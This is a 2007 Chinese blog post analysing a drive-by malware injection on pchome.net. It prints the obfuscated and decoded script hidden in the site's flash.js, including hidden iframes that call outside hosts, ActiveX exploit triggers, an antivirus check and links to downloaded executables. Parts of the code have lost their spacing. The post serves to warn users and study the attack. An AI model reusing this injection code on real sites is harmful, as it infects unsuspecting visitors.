截至2007-12-29 19:04 仍未修復
##I#KE+X#D=$I#KE+XDI=KE+=X++D$IK#E#X+DI$KE+X=D=IK$E+$X=$D#I+$KEX$#DI+K#EXD=IKE+X#D#=I==K+E==XD+I#K$E$#X$D##I
從論壇看到的消息說pchome的某頁面被掛馬了,於是上去找,http://article.pchome.net/content-502393-7.html#topView
掛得比較隱蔽,[url]http://btn.pchome.net/flash.js[/url]的中間被加入瞭如下代碼:
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]('\x3c\x69\x66\x72\x61\x6d\x65\x68\x65\x69\x67\x68\x74\x3d\x30
\x77\x69\x64\x74\x68\x3d\x30\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x35\x39\x2e\x76\x63\x2f\x70\x61\x67\x65\x2f\x61\x64\x64\x5f\x36\x34\x34\x34\x35\x35\x2e\x68\x74\x6d\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');
也就是這個了:
window["document"]["writeln"]('<iframe height=0 width=0 src="http://www.59.vc/page/add_644455.htm"></iframe>');
但只有這個js還不會使得那個iframe生效,使得他生效的是調用這個js顯示flash 的代碼:
<script language="javascript" type="text/javascript">
writeflashhtml("_swf=http://btn.pchome.net/pchome/20071217/300_250.swf", "_width=300", "_height=250" ,"_wmode=opaque");
</script>
有了這個,iframe就生效了;經過一番調用和解密後得:
functionbIsKIS(){for(i=2;i<26;i++){var
kis6=new Image();var
kis7=newImage();varroot=String.fromCharCode(65+i);kis6.src="mk:@MSITStore:"+root+":\\ProgramFiles\\Kaspersky
Lab\\Kaspersky Internet
Security6.0\\Doc\\context.chm::/p_w_picpaths/help.gif";kis7.src="mk:@MSITStore:"+root+":\\ProgramFiles\\Kaspersky
Lab\\Kaspersky Internet
Security7.0\\Doc\\context.chm::/p_w_picpaths/help.gif";if(kis6.height==41||kis7.height==41)returntrue}return
false}var
Then=newDate();aaxxx="xxxyyyyfassssfsadfasdf";Then.setTime(Then.getTime()+24*60*60*1000);varaaffdasfascookie=new
String(document.cookie);varcookieHeader="Cookie1=";aaxxx="xxxyyyyfassssfsadfasdf";if(!bIsKIS()&&aaffdasfascookie.indexOf(cookieHeader)==-1){aaxxx="xxxyyyyfassssfsadfasdf";document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString();aaxxx="xxxyyyyfassssfsadfasdf";try{if(newActiveXObject("IERPCtl.IERPCtl.1"))document.write('<iframestyle=display:none
src="[url]http://w18.vg/real.gif[/url]"></iframe>')}catch(e){}try{if(navigator.userAgent.toLowerCase().indexOf("msie7")==-1)document.write('<iframe
style=display:none src="[url]http://w18.vg/ms.gif[/url]"></iframe>')}catch(e){}try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe style=display:none src="[url]http://w18.vg/xl.gif[/url]"></iframe>')}catch(e){}try{if(newActiveXObject("GLCHAT.GLChatCtrl.1"))document.write('<iframestyle=display:none
src="[url]http://w18.vg/lz.gif[/url]"></iframe>')}catch(e){}try{if(newActiveXObject("MPS.StormPlayer.1"))document.write('<iframestyle=display:none src="[url]http://w18.vg/bf.gif[/url]"></iframe>')}catch(e){}try{if(new ActiveXObject("BaiduBar.Tool.1"))document.write('<iframe style=display:none src="[url]http://w18.vg/baidu.gif[/url]"></iframe>')}catch(e){}}
K##E+XD++IK+EX=#D$IKEXD+$I#KEXDI+K$EX$DI$$KE##X#DI=K+E$X=$DI#K+#EX=DIK=E$=XDIK=$EX=DIK$E$#X=D=I##KE#=X+$D+
挑了幾個解密得:[url]http://w18.vg/s.exe[/url]
從這個文件裏面得到另外一個鏈接:[url]http://w18.vg/ss.exe[/url]
有點面熟的東西……
##K=E#X+D=IKE$XD$=I==K+#EXD=#I=KE$+XDI#K$=EX=D=#IK+E=X$D==I=#K=E##X$D$+IK=#EXD+IK$EX$=D+I+K#E$XD+IKEX#D
從上面可以知道,出問題的是那個flash.js,因此所有使用這個js來放flash的頁面全都有毒了!我隨便找了幾個頁面,發現都是有毒的,這回可是大面積的被掛咯,同志們自己小心了。
K$EX=+DI#$KE+X#DIK$EXD$I=KE$XD+#I+KEXD=I+KE=X$D=I=KEXD#=IK==E$X=D=I#+KEXD=IK#EX#DI=K=E=X=#DIKEXDI#KE
轉載請保留聲明!([url]http://hi.baidu.com/dikex/blog/item/36300afa339a8c889e5146f5.html[/url])
作者dikex(六翼刺蝟),原文鏈接:[url]http://hi.baidu.com/dikex/blog/item/92f804c70762ead8d10060ff.html[/url]
Pchome.net出現大面積掛馬現象!
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章
安卓口令紅包漏洞破解方法“如何搶到非蘋果用戶不能搶到的紅包”
最近在各大媒體網站如微信朋友圈,QQ空間以及一些各種聯盟上都出現了一條“非蘋果用戶不能搶的口令紅包”。該紅包通過利用安卓手機的漏洞實現,而對於蘋果機則不影響。 紅包發生方法如下: 1.在手